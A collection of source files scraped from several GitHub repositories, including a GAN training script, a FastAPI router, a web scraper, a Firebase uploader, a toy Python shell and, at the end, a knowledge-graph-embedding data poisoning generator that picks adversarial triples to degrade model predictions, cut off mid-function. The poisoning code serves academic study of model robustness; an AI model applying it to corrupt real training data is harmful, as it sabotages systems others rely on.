pd.DataFrame(data=scaler.inverse_transform(standardized_data), columns=colnames, index=data.index)\n data = pd.concat([standardized_data, data[exclude]], axis=1, sort=False)\n return data\n\n train_tracker[\"real_ET\"] = invert_standardize_data(data=train_tracker, scaler=scaler[\"Tracker\"], exclude=[\"theta\", \"phi\", \"region\"])[\"real_ET\"]\n train_tracker[\"real_ET\"] /= scaler[\"Calo\"]\n\n test_tracker[\"real_ET\"] = invert_standardize_data(data=test_tracker, scaler=scaler[\"Tracker\"], exclude=[\"theta\", \"phi\", \"region\"])[\"real_ET\"]\n test_tracker[\"real_ET\"] /= scaler[\"Calo\"]\n\n assert np.max(train_calo) == 1, \"Train calo maximum not one. Given: {}.\".format(np.max(train_calo))\n # assert np.allclose(np.mean(train_tracker[keep_cols[:-1]], axis=0), 0, atol=1e-5), \"Train not centralized: {}.\".format(\n # np.mean(train_tracker[keep_cols], axis=0)\n # )\n # assert np.allclose(np.mean(test_tracker, axis=0), 0, atol=1e-1), \"Test not centralized: {}.\".format(np.mean(test_tracker, axis=0))\n # assert np.allclose(np.std(train_tracker[keep_cols[:-1]], axis=0), 1, atol=1e-10), \"Train not standardized: {}.\".format(\n # np.std(train_tracker[keep_cols], axis=0)\n # )\n assert image_shape == train_calo.shape[1:], \"Wrong image shape vs train shape: {} vs {}.\".format(image_shape, train_calo.shape[1:])\n train_tracker = train_tracker[keep_cols].values\n test_tracker = test_tracker[keep_cols].values\n test_tracker = test_tracker[:nr_test]\n logging_tracker = test_tracker[:15]\n\n nr_train = train_calo.shape[0]\n\n ############################################################################################################\n # Preparation\n ############################################################################################################\n def prepare_algorithm(network, optimizer, learning_rate):\n network.compile(logged_labels=logging_tracker, logged_images=logging_calo, optimizer=optimizer, learning_rate=learning_rate,\n loss=loss, feature_matching=feature_matching, label_smoothing=label_smoothing)\n network.set_attributes(keep_cols)\n post_message = \"\"\"\\nCalo shape: {}\\nTracker shape: {}\n \\nUsed attributes: {}\n \\nAppend attributes at every layer: {}\"\"\".format(train_calo.shape, train_tracker.shape, keep_cols, append_y)\n network.log_architecture(post_message=post_message)\n\n nr_params = network.get_number_params()\n nr_gen_params = network._nets[0].get_number_params()\n nr_disc_params = network._nets[1].get_number_params()\n sampler = network.get_sampling_distribution()\n config_data.update({\"nr_params\": nr_params, \"sampler\": sampler, \"generator_out\": network._generator._output_layer.name, \"optimizer\": optimizer.__name__, \"nr_gen_params\": nr_gen_params, \"nr_disc_params\": nr_disc_params})\n\n config_data.pop(\"architectures\")\n with open(path_saving+\"/config.json\", \"w\") as f:\n json.dump(config_data, f, indent=4)\n\n config_data = init.create_config_file(globals())\n\n ############################################################################################################\n # Model Training\n ############################################################################################################\n\n try:\n network = create_algorithm(algorithm, x_dim=x_dim, y_dim=y_dim, z_dim=z_dim,\n gen_architecture=architecture_gen, adv_architecture=architecture_adv,\n aux_architecture=architecture_aux,\n folder=path_saving, append_y_at_every_layer=append_y,\n is_patchgan=is_patchgan, is_wasserstein=is_wasserstein)\n\n prepare_algorithm(network, optimizer, learning_rate)\n\n network.show_architecture()\n network.train(x_train=train_calo, y_train=train_tracker, x_test=test_calo, y_test=test_tracker,\n epochs=epochs, batch_size=batch_size, steps=steps_gen, log_step=steps_log, gpu_options=gpu_options,\n batch_log_step=None)\n with open(path_saving+\"/EXIT_FLAG0.txt\", \"w\") as f:\n f.write(\"EXIT STATUS: 0. No errors or warnings.\")\n tf.reset_default_graph()\n except GeneratorExit as e:\n with open(path_saving+\"/EXIT_FLAG1.txt\", \"w\") as f:\n f.write(\"EXIT STATUS: 1. {}.\".format(e))\n tf.reset_default_graph()\n","repo_name":"tneuer/Masterarbeit","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73475143687","text":"import uuid\nfrom pydantic import BaseModel\nfrom fastapi import Depends\nfrom app.ctx import AppCtx\nfrom app.utils import fastapi as fastapi_utils\nfrom app.utils import auth as auth_utils\nfrom sqlalchemy.sql import expression as sa_exp\nfrom app.models import orm as m\n\nrouter = fastapi_utils.CustomAPIRouter(\n prefix=\"/performance/log\", tags=[\"performance_log\"]\n)\n\n\nclass PerformanceLogGetAndListResponse(BaseModel):\n id: uuid.UUID\n count: int\n weight: int\n\n\n@router.api_wrapper(\"GET\", \"/:id\", error_codes=[])\nasync def performance_log_get(\n id: uuid.UUID,\n) -> PerformanceLogGetAndListResponse:\n performance_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.PerformanceLog).where(m.PerformanceLog.id == id)\n )\n ).scalar_one_or_none()\n\n if performance_log is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n return PerformanceLogGetAndListResponse(\n id=performance_log.id,\n count=performance_log.count,\n weight=performance_log.weight,\n )\n\n\n@router.api_wrapper(\"GET\", \"\", error_codes=[])\nasync def performance_log_list() -> list[PerformanceLogGetAndListResponse]:\n performance_log_query = sa_exp.select(m.PerformanceLog)\n\n performance_log_query = performance_log_query.order_by(\n m.PerformanceLog.created.asc()\n )\n\n performance_log_list = (\n (await AppCtx.current.db.session.execute(performance_log_query)).scalars().all()\n )\n\n return [\n PerformanceLogGetAndListResponse(\n id=performance_log.id,\n count=performance_log.count,\n weight=performance_log.weight,\n )\n for performance_log in performance_log_list\n ]\n\n\nclass PerformanceLogPostRequest(BaseModel):\n count: int\n weight: int\n exercise_category_id: uuid.UUID\n daily_log_id: uuid.UUID\n\n\nclass PerformanceLogPostResponse(BaseModel):\n id: uuid.UUID\n\n\n@router.api_wrapper(\n \"POST\",\n \"\",\n error_codes=[],\n)\nasync def performance_log_post(\n q: PerformanceLogPostRequest,\n) -> PerformanceLogPostResponse:\n exercise_category = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.ExerciseCategory).where(\n m.ExerciseCategory.id == q.exercise_category_id\n )\n )\n ).scalar_one_or_none()\n\n if exercise_category is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n daily_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.DailyLog).where(m.DailyLog.id == q.daily_log_id)\n )\n ).scalar_one_or_none()\n\n if daily_log is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n performance_log = m.PerformanceLog(\n count=q.count,\n weight=q.weight,\n exercise_category=exercise_category,\n daily_log=daily_log,\n )\n\n AppCtx.current.db.session.add(performance_log)\n\n await AppCtx.current.db.session.commit()\n\n return PerformanceLogPostResponse(id=performance_log.id)\n\n\nclass PerformanceLogPatchRequest(BaseModel):\n count: int | None\n weight: int | None\n\n\nclass PerformanceLogPatchResponse(BaseModel):\n id: uuid.UUID\n count: int\n weight: int\n\n\n@router.api_wrapper(\n \"PATCH\",\n \"/:id\",\n error_codes=[],\n)\nasync def performance_log_patch(\n id: uuid.UUID,\n q: PerformanceLogPatchRequest,\n) -> PerformanceLogPatchResponse:\n performance_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.PerformanceLog).where(m.PerformanceLog.id == id)\n )\n ).scalar_one_or_none()\n\n if performance_log is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n for key, value in q.__dict__.items():\n if value is not None:\n setattr(performance_log, key, value)\n\n AppCtx.current.db.session.add(performance_log)\n\n await AppCtx.current.db.session.commit()\n\n return PerformanceLogPatchResponse(\n id=performance_log.id,\n count=performance_log.count,\n weight=performance_log.weight,\n )\n\n\n@router.api_wrapper(\n \"DELETE\",\n \"/:id\",\n error_codes=[],\n)\nasync def performance_log_delete(\n id: uuid.UUID,\n) -> fastapi_utils.DefaultResponse:\n performance_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.PerformanceLog).where(m.PerformanceLog.id == id)\n )\n ).scalar_one_or_none()\n\n if performance_log is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n await AppCtx.current.db.session.delete(performance_log)\n\n await AppCtx.current.db.session.commit()\n\n return fastapi_utils.DefaultResponse()\n","repo_name":"Mactto/weight-daily-log-api","sub_path":"app/apis/performance_log.py","file_name":"performance_log.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41092897494","text":"from lxml.html import parse\nfrom pprint import pprint\nimport pickle\nimport re\n\n\"\"\"\nFetch this week's soup from Leon's website\n\nRun: daily, early morning\n\"\"\"\n\noutfile = '/tmp/leon.pkl'\nsoupurl = 'http://leonrestaurants.co.uk/menu/all-day/'\n\ndef fix_text(astr) :\n\tastr = astr.replace(' Soup', '').strip()\n\treturn astr\n\n\ndef is_soup(item):\n\tif (\"Soup\" in item):\n\t\treturn True\n\treturn False\n\n\ndoc = parse(soupurl)\nelements = doc.xpath('//div[@class=\"more-info-wrapper\"]/h1[@class=\"menu-item-title\"]')\n\nroughlist = [elem.text for elem in elements if (is_soup(elem.text))]\nsouplist = map(fix_text, roughlist)\n\n#pprint(souplist)\n\noutput = open(outfile, 'wb')\npickle.dump(souplist, output, -1)\noutput.close()\n","repo_name":"simonharris/whatsoupisittoday.com","sub_path":"_scripts/fetch_leon.py","file_name":"fetch_leon.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"22860830503","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ride', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='ride',\n name='serviced_by',\n field=models.ForeignKey(related_name='rides', blank=True, to='core.Driver', null=True),\n ),\n ]\n","repo_name":"cmpe-295/project-backend","sub_path":"safe_ride/ride/migrations/0002_auto_20161018_0043.py","file_name":"0002_auto_20161018_0043.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"8749001831","text":"# Import for data-typing\nfrom google.auth.transport.requests import AuthorizedSession\nimport google.auth.transport.requests as requests\nfrom http import client\n\n# Built-in libraries\nimport json\nimport threading\nimport time\n\n# Global variables\nerror_files = []\n# ----------------------------------------------------------------------------------\n\n\nclass RequestThread(\n threading.Thread\n):\n def __init__(\n self,\n auth_session: AuthorizedSession,\n file_dir: str,\n index_json_dir: str,\n full_url: str,\n file_name: str,\n index_lock: threading.Lock,\n print_lock: threading.Lock,\n error_lock: threading.Lock,\n ) -> None:\n \"\"\"\n Thread to handle POST requests\n\n Args:\n auth_session (AuthorizedSession): Authenticated request object\n file_dir (str): Directory of JSONs\n index_json_dir (str): Directory of index.json\n full_db_url (str): URL of database\n file_name (str): Name of file to add to database\n index_lock (threading.Lock): Lock to prevent race conditions while accessing/editing index.json\n print_lock (threading.Lock): Lock to prevent race conditions while printing\n error_lock (threading.Lock): Lock to prevent race conditions while adding to error list\n \"\"\"\n threading.Thread.__init__(self)\n self.session = auth_session\n self.file_dir = file_dir\n self.index_json_dir = index_json_dir\n self.full_url = full_url\n self.file_name = file_name\n self.index_lock = index_lock\n self.print_lock = print_lock\n self.error_lock = error_lock\n self.connection_attempts = 0\n\n def run(\n self\n ) -> None:\n \"\"\"\n Function that overrides threading.Thread's default behavior.\n \"\"\"\n global error_files\n\n # Ensures that the program will attempt a few times to connect to the database\n while self.connection_attempts < 3:\n try:\n # Checks to see if the file has already been added to the index\n with self.index_lock:\n with open(self.index_json_dir, \"r\", encoding=\"utf-8\") as f:\n index_json = json.load(f)\n\n # If the file is already in the index\n if self.file_name in index_json.keys():\n # Print lock\n with self.print_lock:\n print(f\"{self.file_name} already exists! \")\n\n # If the file is not already in the index\n else:\n # Builds file path\n full_file_dir = f\"{self.file_dir}/{self.file_name}\"\n\n # Opens JSON file (thread safe because threads are accessing different files)\n with open(full_file_dir, \"r\", encoding=\"utf-8\") as f:\n edit_json_file = json.load(f)\n\n # Renames keys since Firebase does not like $'s in keys\n schema = edit_json_file['$schema']\n json_id = edit_json_file['$id']\n\n del edit_json_file['$schema']\n del edit_json_file['$id']\n\n edit_json_file['schema'] = schema\n edit_json_file['id'] = json_id\n\n json_file = json.dumps(edit_json_file, indent=4, sort_keys=True)\n\n # Sends JSON to database\n response = self.session.post(self.full_url, data=json_file)\n\n # If the database says it was a good request\n if response.status_code == 200:\n\n # Puts response into a JSON\n response_detail = response.json()\n\n # Index lock\n with self.index_lock:\n # Pulls up latest version of index\n with open(self.index_json_dir, \"r\", encoding=\"utf-8\") as f:\n index_json = json.load(f)\n\n # We add the added json name to the index file with the unique ID assigned by the db\n index_json[str(self.file_name)] = response_detail[\"name\"]\n\n # Overwrites index JSON (with formatting)\n with open(self.index_json_dir, \"w\") as f:\n json.dump(index_json, f, indent=4, sort_keys=True)\n\n # Print lock\n with self.print_lock:\n print(f\"{self.file_name} successfully added!\")\n\n # If the databases says it was not a good request\n else:\n # Error lock\n with self.error_lock:\n error_files.append(\n f\"{self.file_name} Error: {response.status_code}\"\n )\n\n # If there is a connection error\n except client.RemoteDisconnected:\n print(f\"Connection failed with {self.file_name}\")\n self.connection_attempts += 1\n\n if self.connection_attempts >= 3:\n error_files.append(f\"{self.file_name} Error: ConnectionError\")\n break\n\n else:\n time.sleep(3)\n pass\n\n else:\n break\n\n\ndef main(\n auth_session: AuthorizedSession,\n file_dir: str,\n index_json_dir: str,\n db_folder_url: str,\n file_list: list[str],\n) -> None:\n \"\"\"\n Main function to add JSONs to the database\n\n Args:\n auth_session (AuthorizedSession): Authenticated request object\n file_dir (str): Directory of JSONs\n index_json_dir (str): Directory of index.json\n db_folder_url (str): URL of target database folder\n file_list (list[str]): List of file names within target directory\n \"\"\"\n global error_files\n\n # Creates locks\n index_lock = threading.Lock()\n print_lock = threading.Lock()\n error_lock = threading.Lock()\n\n # Creates threads\n threads = []\n for file in file_list:\n threads.append(\n RequestThread(\n auth_session,\n file_dir,\n index_json_dir,\n db_folder_url,\n file,\n index_lock,\n print_lock,\n error_lock,\n )\n )\n\n # Starts threads\n for thread in threads:\n thread.start()\n\n # Joins threads\n for thread in threads:\n thread.join()\n\n # Error notifications\n if len(error_files) > 0:\n print(\"The following files had errors:\\n\")\n\n for file in error_files:\n print(file)\n\n error_files = []\n\n print()\n\n\n# If the program is run directly when it is not supposed to\nif __name__ == \"__main__\":\n print(\n \"This code is not meant to be executed directly, please execute main.py instead.\"\n )\n","repo_name":"SethHartman13/Magic-Item-Database-v.2","sub_path":"magic_item_post.py","file_name":"magic_item_post.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"25043136042","text":"class Region:\n \"\"\"Class to store region info\"\"\"\n\n def __init__(self, y_axis, start, stop):\n\n self.y_axis = y_axis\n self.start = start\n self.stop = stop\n\n def to_string(self):\n \"\"\"Return region info as string\"\"\"\n\n line = list(map(str, [self.y_axis, self.start, self.stop]))\n return ('\\t'.join(line) + '\\n')\n\n def to_list(self):\n \"\"\"Return region info as list\"\"\"\n\n return [self.y_axis, self.start, self.stop]\n\n\nclass Segment:\n \"\"\"Class to store segment info\"\"\"\n\n def __init__(self, count, start, stop):\n\n self.count = count\n self.start = start\n self.stop = stop\n\n def to_string(self):\n \"\"\"Return segment info as string\"\"\"\n \n line = list(map(str, [self.count, self.start, self.stop]))\n return ('\\t'.join(line) + '\\n')\n\n def to_list(self):\n \"\"\"Return segment info as string\"\"\"\n\n return [self.count, self.start, self.stop]\n\n\nclass Parser:\n \"\"\"Class to get and parse data from source file\"\"\"\n\n def __init__(self, data_path):\n\n self.data_path = data_path\n # Store regions in a list of Region objects\n self.regions = []\n # Store segments in a list of Segment objects\n self.segments = []\n\n self.get_data()\n self.non_overlapping_segments()\n\n def get_data(self):\n \"\"\"Read source file and create regions and segments datasets\"\"\"\n\n regions_file = open(self.data_path, 'r')\n regions_lines = regions_file.readlines()\n regions_file.close()\n\n for line in regions_lines:\n split_line = line.rstrip().split('\\t')\n start = int(split_line[0])\n stop = int(split_line[1])\n region = Region(0, start, stop)\n self.regions.append(region)\n self.segments = self.segments + [start, stop]\n\n def non_overlapping_segments(self):\n \"\"\"Parse segments dataset as a list of non-overlapping Segment intervals\"\"\"\n\n # Remove duplicated segments to avoid duplicated non-overlapping intervals\n self.segments = list(set(self.segments))\n # Order the segments to set correctly non-overlapping interval\n self.segments.sort()\n # Set non-overlapping intervals as region-region start-stop pairs Segment objects\n # If segment B has start position X, then segment A has end position X-1. The segments do not overlap.\n self.segments = [Segment(0, self.segments[i], self.segments[i + 1] - 1) for i in range(len(self.segments)-1)]\n \n\nclass Process:\n \"\"\"Class to process part1 and part2 tasks and export results\"\"\"\n\n def __init__(self, regions, segments):\n\n self.regions = regions\n self.segments = segments\n\n def to_list(self, dataset):\n \"\"\"Return dataset(Region/Segment) as a list of list info\"\"\"\n\n return [data.to_list() for data in dataset]\n\n def export_data(self, dataset, path):\n \"\"\"Export results to output file\"\"\"\n\n output = open(path, 'w')\n for data in dataset:\n output.write(data.to_string())\n output.close()\n\n def overlap(self, region1, region2):\n \"\"\"Check if two region/segment overlaps\"\"\"\n\n # Overlap border cases consideration:\n # If the overlap is based on 1 position been a START ovelap over a STOP, is not considered overlap\n return ((region1.start <= region2.start < region1.stop) or \n (region1.start < region2.stop <= region1.stop) or \n ((region1.start >= region2.start) and (region1.stop <= region2.stop)))\n\n def part1_task(self):\n \"\"\"Part1 task calculation\"\"\"\n\n for region in self.regions:\n # Store the Y-axis level used by other regions on the start-stop coordinates scope\n overlaped_y_axis = []\n for comp_region in self.regions: \n if self.overlap(comp_region, region):\n overlaped_y_axis.append(comp_region.y_axis)\n\n overlaped_y_axis.sort()\n # Select the highest Y-axis level in used and add 1\n updated_y_axis = overlaped_y_axis[-1] + 1\n # Check if there is and empty lower level. If there are more than one select the lowest\n i = 0\n while i < len(overlaped_y_axis)-1:\n if overlaped_y_axis[i+1] > overlaped_y_axis[i] + 1:\n updated_y_axis = overlaped_y_axis[i] + 1\n break\n i+=1\n # Update the region Y-axis level value\n region.y_axis = updated_y_axis\n\n def part2_task(self):\n \"\"\"Part2 task calculation\"\"\"\n\n for segment in self.segments:\n for region in self.regions:\n if self.overlap(segment, region):\n # If a region overlap the segment add 1 to segment count\n segment.count += 1\n # Remove segments with no overlapping regions\n self.segments = [segment for segment in self.segments if segment.count>0]\n","repo_name":"AgustinPardo/Illumina-Challenge","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"10002337293","text":"import os\nimport shutil\n\nimport subprocess\n\n\nclass Shell: \n \n \n\n def __init__(self, root_path):\n \n self.root_path = root_path\n self.process = 0\n if os.path.exists('log.txt'):\n \n posR = open('log.txt','r')\n pos = posR.read()\n strings = pos.split('\\n')\n if pos.__len__() > 1:\n \n lastCommand = strings[strings.__len__()-2]\n\n self.callWrite = int(lastCommand[0])\n else:\n self.callWrite = 0\n else:\n self.log = open('log.txt','x')\n self.callWrite = 0\n \n def ls(self):\n #pasta = self.root_path\n #esta mostrado diretorios desnecessarios\n\n return os.listdir('./')\n\n def pwd(self):\n return self.root_path\n\n def cd(self, path):\n \n if path.__len__() == 1:\n os.chdir('/')\n self.root_path = os.getcwd()\n else:\n try:\n os.chdir(path[1])\n self.root_path = os.getcwd()\n \n except:\n print(\"cd: \"+path[1]+\": No such file or directory\")\n\n def cp(self, orig, dest):\n try:\n shutil.copy( orig , dest )\n except:\n print('cp: cannot stat '+orig+': No such file or directory')\n\n def mv(self, orig, dest):\n try:\n if orig == 'log.txt' or orig == 'help':\n print('no permission to remove this file press help for information')\n else:\n shutil.move( orig , dest ) \n except:\n print('mv: cannot stat '+orig+': No such file or directory') \n \n def rm(self,arq='', file=''):\n if os.path.exists(file):\n if arq == '':\n if os.path.isfile(file):\n if file == 'log.txt' or file == 'help.txt':\n print('no permission to remove file \\npress help for information')\n else:\n os.remove(file)\n\n elif os.path.isdir(file):\n print('rm: cannot remove '+file+': Is a directory')\n else:\n print('rm: cannot remove '+file+': No such file or directory')\n else:\n if arq == '-r':\n shutil.rmtree(file)\n else:\n print('rm: cannot remove '+file+': No such file or directory')\n \n def mkdir(self,pasta):\n if os.path.isdir(pasta):\n print ('mkdir: cannot create directory \"'+pasta+'\": File exists')\n else:\n os.mkdir(pasta)\n\n def uname(self):\n return os.uname() \n \n def rename(self,orig,dest):\n if os.path.exists(orig):\n os.rename(orig,dest)\n else:\n print('No such file or directory')\n\n def cat(self,arq):\n file = open(arq,'r')\n lines = file.read()\n return lines\n\n def testScript(self,script):\n if ( script[script.__len__()-3] == '.'):\n if script[script.__len__()-2] == 'p' and script[script.__len__()-1] == 'y':\n return True\n else:\n return False\n else:\n return False\n\n def exec(self,scrip):\n try:\n exec(open(scrip).read())\n\n except:\n print('error ao execultar o script')\n\n def writeLog(self,string):\n self.callWrite+=1\n self.log= open(\"log.txt\", \"a\")\n s = str(self.callWrite)+\" \"+string+\"\\n\"\n self.log.write(s)\n\n def history(self):\n return self.cat('log.txt')\n\n def grep(self, words, arquivo):\n out = []\n try:\n \n strings = self.readStrings(arquivo)\n for word in strings:\n st = word.split(' ')\n for item in st:\n if words == item:\n out.append(words) \n \n return out\n except:\n return out\n\n\n \n def readStrings(self,arquivo):\n posR = open(arquivo,'r')\n pos = posR.readlines()\n return pos\n\n \n\n\n\nif __name__ == \"__main__\":\n shell = Shell( os.getcwd())\n \n print(\"-- Welcome to Shell \\nPress -help for Commands or q to out--\\n\")\n s = ' '\n while(s != 'exit'):\n s = input(\"\"+shell.pwd()+\"# \") \n\n s1 = s.split(' ')\n if s1.__len__() == 1:\n shell.writeLog(s)\n if s1[0] == \"ls\":\n for item in shell.ls():\n print(item)\n \n elif s1[0] == \"pwd\":\n print(shell.pwd())\n \n elif s1[0] == \"uname\":\n \n print(shell.uname())\n \n elif s1[0] == 'help':\n print('needs help')\n\n elif s1[0] == 'history':\n print(shell.history())\n elif s1[0] == 'exit':\n pass\n else:\n print(s+\": command not found\")\n\n else:\n shell.writeLog(s)\n if s1[0] == 'cd':\n \n if( s1.__len__() == 2):\n shell.cd(s1)\n \n else:\n print(s+\": command not found\")\n\n elif s1[0] == 'cp':\n \n if( s1.__len__() == 3):\n shell.cp(s1[1],s1[2])\n \n else:\n print(s+\": command not found\")\n\n elif s1[0] =='mv':\n \n if( s1.__len__() == 3):\n shell.mv(s1[1],s1[2])\n else:\n print(s+\": command not found\")\n\n elif s1[0] == 'rm':\n \n if s1.__len__() == 2: \n shell.rm(file = s1[1])\n elif( s1.__len__() == 3):\n shell.rm(s1[1],s1[2])\n else:\n print(s+\": command not found\")\n\n elif s1[0] == 'mkdir':\n \n if s1.__len__() == 2:\n shell.mkdir(s1[1])\n else: \n 'mkdir: missing operand\\nTry \"help\" for more information.'\n \n elif s1[0] == 'rename':\n if s1.__len__() == 3:\n shell.rename(s1[1],s1[2])\n else: \n 'rename error: Try \"help\" for more information.'\n\n elif s1[0] == 'cat':\n if s1.__len__() == 2:\n print(shell.cat(s1[1]))\n else: \n 'cat error: Try \"help\" for more information.'\n \n elif s1[0] == './':\n if s1.__len__() == 2:\n shell.exec(s1[1])\n \n elif s1[0] == 'grep':\n if s1.__len__() == 3:\n print(shell.grep(s1[1],s1[2]))\n\n else:\n print(s+\": command not found\")\n \n \n \n \n\n","repo_name":"RodrigoPrintes/SO","sub_path":"Shell/Shell.py","file_name":"Shell.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73273700809","text":"# proposed by \"Data Poisoning Attack against Knowledge Graph Embedding\"\n# we use the Direct Attack in the paper\n# we want to find the triple (h', r', t') = argmax(f(h,r',t') - f(h+dh, r', t'))\n# CUDA_VISIBLE_DEVICES=0 python codes/noise_generator/direct_addition.py --init_checkpoint ./models/ComplEx_FB15k-237_baseline/\n\nimport itertools\n\nimport torch\n\nfrom collections import defaultdict\nfrom random_noise import *\nimport torch.autograd as autograd\n\n\nclass DirectAddition(GlobalRandomNoiseAttacker):\n def __init__(self, args):\n super(DirectAddition, self).__init__(args)\n self.score_func = lambda s1, s2: args.lambda1 * s1 - args.lambda2 * s2\n self.name = \"direct\"\n\n self.true_rel_head, self.true_rel_tail = defaultdict(set), defaultdict(set)\n for triple in self.input_data.all_true_triples:\n self.add_true_triple(triple)\n \n def add_true_triple(self, triple):\n h, r, t = triple\n self.true_rel_tail[h].add((r, t))\n self.true_rel_head[t].add((r, h))\n\n def get_noise_for_head(self, test_triple, mode=\"head-batch\"):\n args = self.args\n h, r, t = test_triple\n true_cand = self.true_rel_tail[h] if mode == \"head-batch\" else self.true_rel_head[t]\n s = time.time()\n cand_r_list = random.choices(self.all_relations, k=args.num_cand)\n cand_e_list = random.choices(self.all_entities, k=args.num_cand)\n cand_r_e_list = list(set(zip(cand_r_list, cand_e_list)).difference(true_cand))\n cand_r_list, cand_e_list = zip(*cand_r_e_list)\n cand_r_list, cand_e_list = list(cand_r_list), list(cand_e_list)\n args.num_cand = len(cand_r_list)\n\n embed_h = self.kge_model.entity_embedding[h]\n embed_r = self.kge_model.relation_embedding[r]\n embed_t = self.kge_model.entity_embedding[t]\n score = self.kge_model.score_embedding(embed_h, embed_r, embed_t)\n perturbed_embed_h, perturbed_embed_t = None, None\n if mode == \"head-batch\":\n embed_h_grad = autograd.grad(score, embed_h)[0]\n perturbed_embed_h = embed_h - args.epsilon * embed_h_grad\n elif mode == \"tail-batch\":\n embed_t_grad = autograd.grad(score, embed_t)[0]\n perturbed_embed_t = embed_t - args.epsilon * embed_t_grad\n\n b_begin = 0\n cand_scores = []\n with torch.no_grad():\n while b_begin < args.num_cand:\n b_cand_r = cand_r_list[b_begin: b_begin + args.num_cand]\n b_cand_e = cand_e_list[b_begin: b_begin + args.num_cand]\n b_begin += args.num_cand\n\n embed_cand_r = self.kge_model.relation_embedding[b_cand_r]\n embed_cand_e = self.kge_model.entity_embedding[b_cand_e]\n s1, s2 = None, None\n if mode == \"head-batch\":\n s1 = self.kge_model.score_embedding(perturbed_embed_h, embed_cand_r, embed_cand_e, mode=mode)\n s2 = self.kge_model.score_embedding(embed_h, embed_cand_r, embed_cand_e, mode=mode)\n elif mode == \"tail-batch\":\n s1 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, perturbed_embed_t, mode=mode)\n s2 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, embed_t, mode=mode)\n score = self.score_func(s1, s2)\n score = score.detach().cpu().numpy().tolist()\n cand_scores += score\n cand_scores = np.array(cand_scores)\n idx = np.argmax(cand_scores)\n score = cand_scores[idx]\n if mode == \"head-batch\":\n return (h, cand_r_list[idx], cand_e_list[idx]), score.item()\n return (cand_e_list[idx], cand_r_list[idx], t), score.item()\n\n def get_noise_triples(self):\n noise_triples, args = self.noise_triples, self.args\n args.num_cand = np.math.ceil((args.nentity*args.nrelation)*args.corruption_factor / 100)\n all_true_triples = set(self.input_data.all_true_triples)\n for i in range(len(self.target_triples)):\n sys.stdout.write(\"%d in %d\\r\" % (i, len(self.target_triples)))\n sys.stdout.flush()\n target_triple = self.target_triples[i]\n noise_triple_h, score_h = self.get_noise_for_head(target_triple, mode=\"head-batch\")\n noise_triple_t, score_t = self.get_noise_for_head(target_triple, mode=\"tail-batch\")\n if score_h > score_t:\n noise_triples.add(noise_triple_h)\n self.add_true_triple(noise_triple_h)\n else:\n noise_triples.add(noise_triple_t)\n self.add_true_triple(noise_triple_t)\n return list(noise_triples)\n\nclass CentralDiffAddition(DirectAddition):\n def __init__(self, args):\n super(CentralDiffAddition, self).__init__(args)\n self.name = \"central_diff\"\n self.args.epsilon = self.args.learning_rate\n\n def get_noise_for_head(self, test_triple, mode=\"head-batch\"):\n args = self.args\n h, r, t = test_triple\n true_cand = self.true_rel_tail[h] if mode == \"head-batch\" else self.true_rel_head[t]\n cand_r_list = random.choices(self.all_relations, k=args.num_cand)\n cand_e_list = random.choices(self.all_entities, k=args.num_cand)\n cand_r_e_list = list(set(zip(cand_r_list, cand_e_list)).difference(true_cand))\n cand_r_list, cand_e_list = zip(*cand_r_e_list)\n cand_r_list, cand_e_list = list(cand_r_list), list(cand_e_list)\n args.num_cand = len(cand_r_list)\n\n embed_h = self.kge_model.entity_embedding[h]\n embed_r = self.kge_model.relation_embedding[r]\n embed_t = self.kge_model.entity_embedding[t]\n score = self.kge_model.score_embedding(embed_h, embed_r, embed_t)\n perturbed_embed_e, enforced_embed_e = None, None\n ########## begin difference ############\n if mode == \"head-batch\":\n embed_h_grad = autograd.grad(score, embed_h)[0]\n perturbed_embed_e = embed_h - args.epsilon * embed_h_grad\n enforced_embed_e = embed_h + args.epsilon * embed_h_grad\n elif mode == \"tail-batch\":\n embed_t_grad = autograd.grad(score, embed_t)[0]\n perturbed_embed_e = embed_t - args.epsilon * embed_t_grad\n enforced_embed_e = embed_t + args.epsilon * embed_t_grad\n ########## end difference ############\n\n b_begin = 0\n cand_scores = []\n while b_begin < args.num_cand:\n b_cand_r = cand_r_list[b_begin: b_begin + args.num_cand]\n b_cand_e = cand_e_list[b_begin: b_begin + args.num_cand]\n b_begin += args.num_cand\n\n embed_cand_r = self.kge_model.relation_embedding[b_cand_r]\n embed_cand_e = self.kge_model.entity_embedding[b_cand_e]\n s1, s2 = None, None\n ########## begin difference ############\n if mode == \"head-batch\":\n 